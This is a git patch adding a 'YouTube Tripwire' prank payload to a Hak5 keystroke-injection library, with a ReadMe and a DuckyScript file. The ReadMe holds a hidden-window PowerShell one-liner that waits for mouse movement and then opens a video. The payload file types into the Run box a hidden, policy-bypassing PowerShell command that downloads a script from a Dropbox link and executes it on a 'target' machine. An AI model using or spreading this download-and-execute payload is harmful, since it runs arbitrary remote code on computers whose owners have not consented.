YouTube Tripwire --- .../library/prank/-BB-YT-Tripwire/ReadMe.md | 116 ++++++++++++++++++ .../library/prank/-BB-YT-Tripwire/payload.txt | 15 +++ 2 files changed, 131 insertions(+) create mode 100644 payloads/library/prank/-BB-YT-Tripwire/ReadMe.md create mode 100644 payloads/library/prank/-BB-YT-Tripwire/payload.txt diff --git a/payloads/library/prank/-BB-YT-Tripwire/ReadMe.md b/payloads/library/prank/-BB-YT-Tripwire/ReadMe.md new file mode 100644 index 00000000..4e711443 --- /dev/null +++ b/payloads/library/prank/-BB-YT-Tripwire/ReadMe.md @@ -0,0 +1,116 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# YouTube Tripwire + +Plays any YouTube video after a mouse movement is detected + +## Description + +This script is a one liner that can fit in the runbox by itself +Just replace the URL for the Youtube video and run it +You can now unplug your device and walk away +When your target returns and moves their mouse the video will start playing full screen + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Walk away +* You can run the example snippet below and it will open up a video covering one of my other payloads +``` +powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f') +``` +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

πŸ“± My Socials πŸ“±

+
+ + + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Golang + +
Instagram + 		+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +

diff --git a/payloads/library/prank/-BB-YT-Tripwire/payload.txt b/payloads/library/prank/-BB-YT-Tripwire/payload.txt new file mode 100644 index 00000000..0c807e98 --- /dev/null +++ b/payloads/library/prank/-BB-YT-Tripwire/payload.txt @@ -0,0 +1,15 @@ +REM Title: YouTube-TripWire + +REM Author: I am Jakoby + +REM Description: Plays any YouTube video after a mouse movement is detected + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly